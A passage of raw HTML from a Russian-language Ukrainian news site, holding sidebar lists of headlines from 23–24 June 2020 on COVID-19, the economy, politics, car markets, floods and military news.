заполнить дешевые дизельные автомобили из Германии" class="name">Украинский авторынок могут заполнить дешевые дизельные автомобили из Германии <span>(6132)</span></a></li></ul></li><li><ul class="tact"><li id="li2" style="width:210px;"><a href="https://enovosty.com/news_technology/full/2406-v-ssha-pokazali-kak-proxodili-ispytaniya-novoj-termoyadernoj-bomby-b61-12-s-borta-f-35a-foto" title="В США показали, как проходили испытания новой термоядерной бомбы B61-12 с борта F-35A (ФОТО)"><img width="210" height="156" alt="В США показали, как проходили испытания новой термоядерной бомбы B61-12 с борта F-35A (ФОТО)" src="https://enovosty.com/wp-content/uploads/2020/06/111111111-e1592929763847.jpg"></a><a href="https://enovosty.com/news_technology/full/2406-v-ssha-pokazali-kak-proxodili-ispytaniya-novoj-termoyadernoj-bomby-b61-12-s-borta-f-35a-foto" title="В США показали, как проходили испытания новой термоядерной бомбы B61-12 с борта F-35A (ФОТО)" class="name">В США показали, как проходили испытания новой термоядерной бомбы B61-12 с борта F-35A (ФОТО) <span>(3801)</span></a></li></ul></li><li><ul class="tact"><li id="li3" style="width:210px;"><a href="https://enovosty.com/news_technology/full/2306-kitayu-bolshe-ne-nuzhna-amerikanskaya-gps-u-nego-est-svoya-sistema-navigacii" title="Китаю больше не нужна американская GPS - у него есть своя система навигации"><img width="210" height="156" alt="Китаю больше не нужна американская GPS - у него есть своя система навигации" src="https://enovosty.com/wp-content/uploads/2020/06/dims-5.jpg"></a><a href="https://enovosty.com/news_technology/full/2306-kitayu-bolshe-ne-nuzhna-amerikanskaya-gps-u-nego-est-svoya-sistema-navigacii" title="Китаю больше не нужна американская GPS - у него есть своя система навигации" class="name">Китаю больше не нужна американская GPS - у него есть своя система навигации <span>(1616)</span></a></li></ul></li><li><ul class="tact"><li id="li4" style="width:210px;"><a href="https://enovosty.com/news_society/full/2306-na-chernigovshhine-ispytyvayut-boepripasy-k-raketnomu-kompleksu-korsar-foto" title="На Черниговщине испытывают боеприпасы к ракетному комплексу Корсар (ФОТО)"><img width="210" height="156" alt="На Черниговщине испытывают боеприпасы к ракетному комплексу Корсар (ФОТО)" src="https://enovosty.com/wp-content/uploads/2020/06/650x867.jpg"></a><a href="https://enovosty.com/news_society/full/2306-na-chernigovshhine-ispytyvayut-boepripasy-k-raketnomu-kompleksu-korsar-foto" title="На Черниговщине испытывают боеприпасы к ракетному комплексу Корсар (ФОТО)" class="name">На Черниговщине испытывают боеприпасы к ракетному комплексу "Корсар" (ФОТО) <span>(6184)</span></a></li></ul></li><li><ul class="tact"><li id="li5" style="width:210px;"><a href="https://enovosty.com/news_society/full/2306-tam-byla-voda-opublikovany-foto-eko-katastrofy-v-anneksirovannom-krymu-foto" title="Там была вода: опубликованы фото эко-катастрофы в аннексированном Крыму (ФОТО)"><img width="210" height="156" alt="Там была вода: опубликованы фото эко-катастрофы в аннексированном Крыму (ФОТО)" src="https://enovosty.com/wp-content/uploads/2020/06/1592913763-2475.jpg"></a><a href="https://enovosty.com/news_society/full/2306-tam-byla-voda-opublikovany-foto-eko-katastrofy-v-anneksirovannom-krymu-foto" title="Там была вода: опубликованы фото эко-катастрофы в аннексированном Крыму (ФОТО)" class="name">"Там была вода": опубликованы фото эко-катастрофы в аннексированном Крыму (ФОТО) <span>(4976)</span></a></li></ul></li><li><ul class="tact"><li id="li6" style="width:210px;"><a href="https://enovosty.com/news-auto/full/2306-kabmin-izmenil-grafik-raboty-sto-kakie-budut-dejstvovat-ogranicheniya" title="Кабмин изменил график работы СТО: какие будут действовать ограничения"><img width="210" height="156" alt="Кабмин изменил график работы СТО: какие будут действовать ограничения" src="https://enovosty.com/wp-content/uploads/2020/06/5-50-e1592902710204.jpg"></a><a href="https://enovosty.com/news-auto/full/2306-kabmin-izmenil-grafik-raboty-sto-kakie-budut-dejstvovat-ogranicheniya" title="Кабмин изменил график работы СТО: какие будут действовать ограничения" class="name">Кабмин изменил график работы СТО: какие будут действовать ограничения <span>(11988)</span></a></li></ul></li><li><ul class="tact"><li id="li7" style="width:210px;"><a href="https://enovosty.com/news_society/full/2306-ukraincam-rasskazali-ob-osobennostyax-predstoyashhej-vstupitelnoj-kampanii-chto-vazhno-znat" title="Украинцам рассказали об особенностях предстоящей вступительной кампании. Что важно знать?"><img width="210" height="156" alt="Украинцам рассказали об особенностях предстоящей вступительной кампании. Что важно знать?" src="https://enovosty.com/wp-content/uploads/2020/06/vuz.jpg"></a><a href="https://enovosty.com/news_society/full/2306-ukraincam-rasskazali-ob-osobennostyax-predstoyashhej-vstupitelnoj-kampanii-chto-vazhno-znat" title="Украинцам рассказали об особенностях предстоящей вступительной кампании. Что важно знать?" class="name">Украинцам рассказали об особенностях предстоящей вступительной кампании. Что важно знать? <span>(2848)</span></a></li></ul></li><li><ul class="tact"><li id="li8" style="width:210px;"><a href="https://enovosty.com/news-markets/full/2306-ukraincev-zastavyat-prodavat-i-sdavat-zhile-cherez-brokerov-v-chem-sut-innovacii" title="Украинцев заставят продавать и сдавать жилье через брокеров. В чем суть инновации?"><img width="210" height="156" alt="Украинцев заставят продавать и сдавать жилье через брокеров. В чем суть инновации?" src="https://enovosty.com/wp-content/uploads/2020/06/25_main.jpg"></a><a href="https://enovosty.com/news-markets/full/2306-ukraincev-zastavyat-prodavat-i-sdavat-zhile-cherez-brokerov-v-chem-sut-innovacii" title="Украинцев заставят продавать и сдавать жилье через брокеров. В чем суть инновации?" class="name">Украинцев заставят продавать и сдавать жилье через брокеров. В чем суть инновации? <span>(4964)</span></a></li></ul></li><li><ul class="tact"><li id="li9" style="width:210px;"><a href="https://enovosty.com/news_economy/full/2306-v-ukraine-nachinayut-avtomaticheski-naznachat-pensii" title="В Украине начинают автоматически назначать пенсии"><img width="210" height="156" alt="В Украине начинают автоматически назначать пенсии" src="https://enovosty.com/wp-content/uploads/2020/06/unnamed-17.jpg"></a><a href="https://enovosty.com/news_economy/full/2306-v-ukraine-nachinayut-avtomaticheski-naznachat-pensii" title="В Украине начинают автоматически назначать пенсии" class="name">В Украине начинают автоматически назначать пенсии <span>(2944)</span></a></li></ul></li><li><ul class="tact"><li id="li10" style="width:210px;"><a href="https://enovosty.com/news-markets/full/2306-v-ukraine-menyaetsya-rabochij-den-kto-budet-rabotat-po-novomu" title="В Украине меняется рабочий день. Кто будет работать по-новому?"><img width="210" height="156" alt="В Украине меняется рабочий день. Кто будет работать по-новому?" src="https://enovosty.com/wp-content/uploads/2020/06/unnamed-18.jpg"></a><a href="https://enovosty.com/news-markets/full/2306-v-ukraine-menyaetsya-rabochij-den-kto-budet-rabotat-po-novomu" title="В Украине меняется рабочий день. Кто будет работать по-новому?" class="name">В Украине меняется рабочий день. Кто будет работать по-новому? <span>(26260)</span></a></li></ul></li><li><ul class="tact"><li id="li11" style="width:210px;"><a href="https://enovosty.com/news-auto/full/2306-top-7-luchshix-avtomobilej-dlya-bolshoj-semi" title="ТОП-7 лучших автомобилей для большой семьи"><img width="210" height="156" alt="ТОП-7 лучших автомобилей для большой семьи" src="https://enovosty.com/wp-content/uploads/2020/06/88fea2e7821430d42de7b3c919f01d67aa62333f-e1592850227993.jpg"></a><a href="https://enovosty.com/news-auto/full/2306-top-7-luchshix-avtomobilej-dlya-bolshoj-semi" title="ТОП-7 лучших автомобилей для большой семьи" class="name">ТОП-7 лучших автомобилей для большой семьи <span>(6304)</span></a></li></ul></li><li><ul class="tact"><li id="li12" style="width:210px;"><a href="https://enovosty.com/news_kiev/full/2306-v-kievmetrostroe-pokazali-na-kakom-etape-stroitelstvo-metro-na-vinogradar-foto" title="В Киевметрострое показали, на каком этапе строительство метро на Виноградарь (ФОТО)"><img width="210" height="156" alt="В Киевметрострое показали, на каком этапе строительство метро на Виноградарь (ФОТО)" src="https://enovosty.com/wp-content/uploads/2020/06/104800994_2795202827256932_2273810907939965723_o-1-e1592849539390.jpg"></a><a href="https://enovosty.com/news_kiev/full/2306-v-kievmetrostroe-pokazali-na-kakom-etape-stroitelstvo-metro-na-vinogradar-foto" title="В Киевметрострое показали, на каком этапе строительство метро на Виноградарь (ФОТО)" class="name">В "Киевметрострое" показали, на каком этапе строительство метро на Виноградарь (ФОТО) <span>(11576)</span></a></li></ul></li><li><ul class="tact"><li id="li13" style="width:210px;"><a href="https://enovosty.com/news_incidents/full/2306-na-zapadnoj-ukraine-nastoyashhij-potop-zhitelej-evakuiruyut-foto-posledstvij-nepogody" title="На Западной Украине настоящий потоп, жителей эвакуируют: фото последствий непогоды"><img width="210" height="156" alt="На Западной Украине настоящий потоп, жителей эвакуируют: фото последствий непогоды" src="https://enovosty.com/wp-content/uploads/2020/06/screenshot_1-13-e1592848686450.jpg"></a><a href="https://enovosty.com/news_incidents/full/2306-na-zapadnoj-ukraine-nastoyashhij-potop-zhitelej-evakuiruyut-foto-posledstvij-nepogody" title="На Западной Украине настоящий потоп, жителей эвакуируют: фото последствий непогоды" class="name">На Западной Украине настоящий потоп, жителей эвакуируют: фото последствий непогоды <span>(3948)</span></a></li></ul></li><li><ul class="tact"><li id="li14" style="width:210px;"><a href="https://enovosty.com/news_society/full/2206-gaz-dlya-naseleniya-v-iyune-podesheveet" title="Газ для населения в июне подешевеет"><img width="210" height="156" alt="Газ для населения в июне подешевеет" src="https://enovosty.com/wp-content/uploads/2020/06/650x433.jpg"></a><a href="https://enovosty.com/news_society/full/2206-gaz-dlya-naseleniya-v-iyune-podesheveet" title="Газ для населения в июне подешевеет" class="name">Газ для населения в июне подешевеет <span>(1296)</span></a></li></ul></li></ul></div><div class="wiget simple_line" style="border-color:#D6E5F2;"><div class="caption" style=""><p style="font-size: 12px; height: 17px; color: #fff; background-color: #346796; padding: 0 5px; display: inline; text-transform: uppercase; font-weight: 700;font-family: arial,verdana,tahoma;">Новости экономики</p></div><div class='cls'></div><span class='news_date'>24.06.2020 г.</span><br /><div class="post_news"><span id="post-4809795"><span class="postDate">13:21</span><a class="postTitle" href="https://enovosty.com/news_economy/full/2406-stavki-po-kreditam-dlya-naseleniya-i-biznesa-v-ukraine-stanut-samymi-nizkimi-za-vsyu-istoriyu">Ставки по кредитам для населения и бизнеса в Украине станут самыми низкими за всю историю</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4809764"><span class="postDate">11:05</span><a class="postTitle" href="https://enovosty.com/news_economy/full/2406-maximalniy-razmer-nalichnih-perevodov-mogut-uvelichit-zakonoproekt">Максимальный размер наличных переводов могут увеличить до 25 тыс грн - законопроект</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4809767"><span class="postDate">10:47</span><a class="postTitle" href="https://enovosty.com/news_economy/full/2406-evrosoyuz-zakroetsya-ot-zhitelej-ryada-stran-komu-zapretyat-vezd">Евросоюз закроется от жителей ряда стран. Кому запретят въезд?</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4809759"><span class="postDate">09:55</span><a class="postTitle" href="https://enovosty.com/news_economy/full/2406-karantin-udaril-po-denezhnym-perevodam-zarobitchan">Карантин ударил по денежным переводам заробитчан</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4809701"><span class="postDate">09:54</span><a class="postTitle" href="https://enovosty.com/news_economy/full/2406-ukraina-otkazalas-ot-idei-kvotirovaniya-importa-mineralnyx-udobrenij">Украина отказалась от идеи квотирования импорта минеральных удобрений</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4809741"><span class="postDate">08:54</span><a class="postTitle" href="https://enovosty.com/news_economy/full/2406-ekspert-rasskazal-o-moshhnoj-zashhite-dlya-investorov-v-ukraine">Эксперт рассказал о мощной защите для инвесторов в Украине</a><br /><div class="postFields"></div></span></div><div class="cls"></div><hr /><div class="cls"></div><div class='cls'></div><span class='news_date'>23.06.2020 г.</span><br /><div class="post_news"><span id="post-4809648"><span class="postDate">18:25</span><a class="postTitle" href="https://enovosty.com/news_economy/full/2306-v-ukraine-nuzhno-privatizirovat-99-kompanij-amelin">В Украине нужно приватизировать 99% компаний, - Амелин</a><br /><div class="postFields"></div></span></div><div class="cls"></div><a class="readMore" href="https://enovosty.com/news/news_economy">Все новости экономики</a></div><div class="wiget simple_line analitika"> <div class="caption"><p style="text-transform: uppercase;
margin: 0;
padding: 0;
text-align: left;
font-size: 12px;
font-weight: 700;
font-family: arial,verdana,tahoma;"><a href="https://enovosty.com/articles">Аналитика</a></p></div><div class="block"><div class="info"><span class="postDate">23.06.2020</span></div><p style="margin-bottom: 3px;
margin: 0;
padding: 0;
text-align: left;
font-size: 12px;
font-weight: 700;
font-family: arial,verdana,tahoma;
"><a class="postTitle" href="https://enovosty.com/ekonomika/full/2306-anatolij-amelin-ekonomicheskaya-model-yuzhnoj-korei-optimalnyj-put-dlya-ukrainy">Анатолий Амелин: Экономическая модель Южной Кореи – оптимальный путь для Украины</a></p><div class="cblock"><a href="https://enovosty.com/ekonomika/full/2306-anatolij-amelin-ekonomicheskaya-model-yuzhnoj-korei-optimalnyj-put-dlya-ukrainy"><img width="230" alt="Анатолий Амелин: Экономическая модель Южной Кореи – оптимальный путь для Украины" src="/wp-content/uploads/2020/06/anatoliy_amelin.jpg"></a></div><span class="postExcerpt"><a href="https://enovosty.com/ekonomika/full/2306-anatolij-amelin-ekonomicheskaya-model-yuzhnoj-korei-optimalnyj-put-dlya-ukrainy">Какие преимущества в борьбе за деньги инвесторов может использовать Украина, почему «Закон о рынке земли» - это мёртвый инструмент, увеличится ли в ближайшее ...</a></span></div><div class="block"><div class="info"><span class="postDate">23.06.2020</span></div><p style="margin-bottom: 3px;
margin: 0;
padding: 0;
text-align: left;
font-size: 12px;
font-weight: 700;
font-family: arial,verdana,tahoma;
"><a class="postTitle" href="https://enovosty.com/politika/full/2306-amerika-rossii-podarit-paroxod-shtaty-opyat-pugayut-putina">Америка России "подарит пароход"? Штаты опять пугают Путина "адскими" санкциями...</a></p><div class="cblock"><a href="https://enovosty.com/politika/full/2306-amerika-rossii-podarit-paroxod-shtaty-opyat-pugayut-putina"><img width="230" alt="Америка России подарит пароход? Штаты опять пугают Путина адскими санкциями..." src="/wp-content/uploads/2020/06/cover_ed-1.jpg"></a></div><span class="postExcerpt"><a href="https://enovosty.com/politika/full/2306-amerika-rossii-podarit-paroxod-shtaty-opyat-pugayut-putina">Из Америки опять поступают интересные новости, и на сей раз они лишь косвенно касаются массовых беспорядков по всей стране, о чем недавно приходилось ...</a></span></div><div class="block"><div class="info"><span class="postDate">20.06.2020</span></div><p style="margin-bottom: 3px;
margin: 0;
padding: 0;
text-align: left;
font-size: 12px;
font-weight: 700;
font-family: arial,verdana,tahoma;
"><a class="postTitle" href="https://enovosty.com/ekonomika/full/2006-sergej-fursa-ukrainskaya-vlast-gotovitsya-kinut-mvf-i-privesti-stranu-k-defoltu">Сергей Фурса: Украинская власть готовится «кинуть» МВФ и привести страну к дефолту</a></p><div class="cblock"><a href="https://enovosty.com/ekonomika/full/2006-sergej-fursa-ukrainskaya-vlast-gotovitsya-kinut-mvf-i-privesti-stranu-k-defoltu"><img width="230" alt="Сергей Фурса: Украинская власть готовится «кинуть» МВФ и привести страну к дефолту" src="/wp-content/uploads/2020/06/fursa-1.jpg"></a></div><span class="postExcerpt"><a href="https://enovosty.com/ekonomika/full/2006-sergej-fursa-ukrainskaya-vlast-gotovitsya-kinut-mvf-i-privesti-stranu-k-defoltu">Как украинская власть готовится к «кидку» МВФ, планируя выразить вотум недоверия Главе НБУ Якову Смолию, ждет ли Украину дефолт в случае прекращения ...</a></span></div></div><div class="wiget simple_line" style="border-color:#D6E5F2;"><div class="caption"><p style="font-weight: 700; font-family: arial,verdana,tahoma; font-size: 12px; text-transform: uppercase; margin: 0; padding: 0; text-align: left;height: 17px;"><a href="https://enovosty.com/news/">Последние новости</a></p></div><div class='cls'></div><span class='news_date'>24.06.2020 г.</span><br /><div class="post_news"> <span id="post-4809798"> <span class="postDate">13:31</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2406-nachalo-v-yumoristicheskom-stile-araxamiya-opravdalsya-za-skandalnyj-razgovor-s-kornienko">"Начало в юмористическом стиле": Арахамия оправдался за скандальный разговор с Корниенко</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4809795"> <span class="postDate">13:21</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/2406-stavki-po-kreditam-dlya-naseleniya-i-biznesa-v-ukraine-stanut-samymi-nizkimi-za-vsyu-istoriyu">Ставки по кредитам для населения и бизнеса в Украине станут самыми низкими за всю историю</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4809791"> <span class="postDate">13:10</span> <a class="postTitle" href="https://enovosty.com/news-auto/full/2406-verxovnaya-rada-mozhet-vozobnovit-lgotnyj-period-dlya-evroblyaxerov-podrobnosti">Верховная Рада может возобновить льготный период для "евробляхеров": подробности</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4809789"> <span class="postDate">12:45</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2406-v-italii-vyrosla-samaya-bolshaya-v-mire-yagoda-vishni-foto">В Италии выросла самая большая в мире ягода вишни (ФОТО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4809788"> <span class="postDate">12:40</span> <a class="postTitle" href="https://enovosty.com/news-markets/full/2406-nash-parovoz-vpered-letit">Наш паровоз вперед летит!</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4809787"> <span class="postDate">12:21</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2406-beglyj-prezident-yanukovich-byl-agentom-kgb-sokursnik-putina-shvec">Беглый президент Янукович был агентом КГБ, - сокурсник Путина Швец</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4809725"> <span class="postDate">12:20</span> <a class="postTitle" href="https://enovosty.com/news_technology/full/2406-serbiya-predstavila-novuyu-otechestvennuyu-artillerijskuyu-raketnuyu-sistemu-foto">Сербия представила новую отечественную артиллерийскую ракетную систему (ФОТО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4809772"> <span class="postDate">12:06</span> <a class="postTitle" href="https://enovosty.com/news_incidents/full/2406-nepogoda-na-zapadnoj-ukraine-opublikovany-masshtaby-katastrofy-foto">Непогода на Западной Украине: опубликованы масштабы катастрофы (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4809773"> <span class="postDate">11:50</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/2406-nato-gotovitsya-asimmetrichno-otvetit-na-agressiiyu-rf">НАТО готовится асимметрично ответить на агрессиию РФ</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4809771"> <span class="postDate">11:44</span> <a class="postTitle" href="https://enovosty.com/news/full/2406-semi-umershix-ot-covid-19-medikov-poluchat-po-15-milliona-griven">Семьи умерших от COVID-19 медиков получат по 1,5 миллиона гривен</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4809762"> <span class="postDate">11:30</span> <a class="postTitle" href="https://enovosty.com/news-auto/full/2406-ukrainskij-avtorynok-mogut-zapolnit-deshevye-dizelnye-avtomobili-iz-germanii">Украинский авторынок могут заполнить дешевые дизельные автомобили из Германии</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4809770"> <span class="postDate">11:14</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2406-v-ukraine-ustanovlen-novyj-antirekord-po-covid-19-chto-vazhno-znat-24-iyunya">В Украине установлен новый антирекорд по COVID-19. Что важно знать 24 июня</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4809764"> <span class="postDate">11:05</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/2406-maximalniy-razmer-nalichnih-perevodov-mogut-uvelichit-zakonoproekt">Максимальный размер наличных переводов могут увеличить до 25 тыс грн - законопроект</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4809760"> <span class="postDate">11:00</span> <a class="postTitle" href="https://enovosty.com/news_technology/full/2406-voenno-morskim-silam-ssha-predlozhili-vooruzhit-esmincy-zumwalt-giperzvukovymi-raketami">Военно-морским силам США предложили вооружить эсминцы Zumwalt гиперзвуковыми ракетами</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4809767"> <span class="postDate">10:47</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/2406-evrosoyuz-zakroetsya-ot-zhitelej-ryada-stran-komu-zapretyat-vezd">Евросоюз закроется от жителей ряда стран. Кому запретят въезд?</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4809757"> <span class="postDate">10:35</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2406-na-vooruzhenie-vsu-postupila-partiya-javelin-na-summu-bolee-27-mln">На вооружение ВСУ поступила партия Javelin на сумму более $27 млн</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4809765"> <span class="postDate">10:31</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2406-shtat-rod-ajlend-izmenit-svoe-nazvanie-iz-za-istoricheskix-svyazej-s-rabstvom">Штат Род-Айленд изменит свое название из-за исторических связей с рабством</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4809755"> <span class="postDate">10:10</span> <a class="postTitle" href="https://enovosty.com/news-auto/full/2406-chuzhoe-pismo-schastya-byvshim-vladelcam-prodannyx-avto-nachali-prixodit-shtrafy">Чужое "письмо счастья": бывшим владельцам проданных авто начали приходить штрафы</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4809759"> <span class="postDate">09:55</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/2406-karantin-udaril-po-denezhnym-perevodam-zarobitchan">Карантин ударил по денежным переводам заробитчан</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4809701"> <span class="postDate">09:54</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/2406-ukraina-otkazalas-ot-idei-kvotirovaniya-importa-mineralnyx-udobrenij">Украина отказалась от идеи квотирования импорта минеральных удобрений</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4809748"> <span class="postDate">09:50</span> <a class="postTitle" href="https://enovosty.com/zdorove/full/2406-vakcina-ot-koronavirusa-mozhet-nikogda-ne-poyavitsya-amosova">Вакцина от COVID-19 может никогда не появиться, - профессор Екатерина Амосова</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4809754"> <span class="postDate">09:44</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2406-mir-soshel-s-uma-byvshij-pastor-prizval-snosit-statui-belogo-iisusa">Мир сошел с ума: бывший пастор призвал сносить статуи «белого Иисуса»</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4809750"> <span class="postDate">09:42</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2406-skandal-s-rabochej-baboj-i-korabelnoj-sosnoj-reakciya-i-biografiya-allaxverdievoj">Скандал с "рабочей бабой и корабельной сосной": Реакция и биография нардепа Аллахвердиевой</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4809743"> <span class="postDate">09:29</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2406-kogda-tvoya-babushka-koroleva-yarkoe-foto-princa-uilyama-i-elizavety-ii-foto">Когда твоя бабушка королева: яркое фото принца Уильяма и Елизаветы II (ФОТО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4809741"> <span class="postDate">08:54</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/2406-ekspert-rasskazal-o-moshhnoj-zashhite-dlya-investorov-v-ukraine">Эксперт рассказал о мощной защите для инвесторов в Украине</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4809736"> <span class="postDate">08:44</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2406-nazvano-pozhiznennye-posledstviya-covid-19">Названы пожизненные последствия COVID-19</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4809739"> <span class="postDate">08:35</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2406-severnaya-koreya-otlichilas-smeshnoj-atakoj-protiv-yuzhnoj-korei-fotofakt">Северная Корея отличилась смешной "атакой" против Южной Кореи (ФОТОФАКТ)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4809735"> <span class="postDate">08:20</span> <a class="postTitle" href="https://enovosty.com/news_kiev/full/2406-kiev-smyagchil-karantin-kuda-mozhno-sxodit-v-stolice">Киев смягчил карантин. Куда можно сходить в столице</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4809703"> <span class="postDate">07:10</span> <a class="postTitle" href="https://enovosty.com/news_incidents/full/2406-bujstvo-stixii-na-zapadnoj-ukraine-troe-pogibshix-zablokirovannye-trassy-i-400-mln-na-vosstanovlenie">Буйство стихии на Западной Украине: трое погибших, заблокированные трассы и 400 млн на восстановление</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4809683"> <span class="postDate">07:00</span> <a class="postTitle" href="https://enovosty.com/news_technology/full/2406-v-ssha-pokazali-kak-proxodili-ispytaniya-novoj-termoyadernoj-bomby-b61-12-s-borta-f-35a-foto">В США показали, как проходили испытания новой термоядерной бомбы B61-12 с борта F-35A (ФОТО)</a><br /> </span><div class="postFields"></div></div><div class="cls"></div><hr /><div class="cls"></div><div class='cls'></div><span class='news_date'>23.06.2020 г.</span><br /><div class="post_news"> <span id="post-4809734"> <span class="postDate">23:46</span> <a class="postTitle" href="https://enovosty.com/news_technology/full/2306-kitayu-bolshe-ne-nuzhna-amerikanskaya-gps-u-nego-est-svoya-sistema-navigacii">Китаю больше не нужна американская GPS - у него есть своя система навигации</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4809733"> <span class="postDate">23:41</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2306-eks-prezidenta-kyrgyzstana-prigovorili-k-11-godam-lisheniya-svobody-za-korrupciyu">Экс-президента Кыргызстана приговорили к 11 годам лишения свободы за коррупцию</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4809726"> <span class="postDate">23:03</span> <a class="postTitle" href="https://enovosty.com/zdorove/full/2306-uchenyj-iz-kitaya-nazval-sroki-zaversheniya-epidemii-covid-19">Ученый из Китая назвал сроки завершения эпидемии COVID-19</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4809707"> <span class="postDate">23:03</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2306-zhizn-v-lokdaune-luchshie-snimki-dikoj-prirody-na-konkurse-life-in-lockdown-foto">Жизнь в локдауне: лучшие снимки дикой природы на конкурсе Life in Lockdown (ФОТО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4809665"> <span class="postDate">23:00</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2306-vsegda-na-pozitive-zabavnye-sobaki-kotorye-lyubyat-podurachitsya-foto">Всегда на позитиве: забавные собаки, которые любят подурачиться (ФОТО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4809704"> <span class="postDate">21:03</span> <a class="postTitle" href="https://enovosty.com/news_kiev/full/2306-glava-zemresursov-kgga-petr-olenich-potratil-dengi-iz-stolichnogo-byudzheta-na-agitaciyu-za-poroshenko-smi">Глава земресурсов КГГА Петр Оленич потратил деньги из столичного бюджета на агитацию за Порошенко, - СМИ</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4809700"> <span class="postDate">20:59</span> <a class="postTitle" href="https://enovosty.com/news-culture/full/2306-okolo-stounxendzha-nashli-shaxty-vozrastom-4-tys-let">Около Стоунхенджа нашли шахты возрастом 4 тыс. лет</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4809692"> <span class="postDate">20:46</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2306-na-chernigovshhine-ispytyvayut-boepripasy-k-raketnomu-kompleksu-korsar-foto">На Черниговщине испытывают боеприпасы к ракетному комплексу "Корсар" (ФОТО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4809690"> <span class="postDate">20:24</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2306-lukashenko-edet-v-mosvku-ne-na-parad-smotret-zloj-odessit">Лукашенко едет в Москву не на парад смотреть, - Злой Одессит</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4809687"> <span class="postDate">20:09</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2306-sbu-blokirovala-deyatelnost-prorossijskix-propagandistov">СБУ блокировала деятельность пророссийских пропагандистов</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4809686"> <span class="postDate">19:56</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2306-okkupacionnye-vojska-rf-nachinayut-v-ordlo-novuyu-volnu-prinuditelnoj-pasportizacii-razvedka">Оккупационные войска РФ начинают в ОРДЛО "новую волну" принудительной паспортизации, - разведка</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4809682"> <span class="postDate">19:40</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2306-nacpoliciya-zaderzhala-prestupnuyu-gruppirovku-kotoraya-specializirovalas-na-poxishhenii-lyudej-dlya-zavladeniya-ix-kvartirami-video">Нацполиция задержала преступную группировку, которая похищала людей для завладения их квартирами (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4809663"> <span class="postDate">19:18</span> <a class="postTitle" href="https://enovosty.com/news_kiev/full/2306-v-stolice-restoranam-razreshili-prinimat-gostej-v-zalax">В столице ресторанам разрешили принимать гостей в залах: подробности</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4809660"> <span class="postDate">18:45</span> <a class="postTitle" href="https://enovosty.com/news-culture/full/2306-odno-lico-neumelyj-restavrator-izurodoval-znamenitnyj-shedevr-foto">"Одно лицо": неумелый 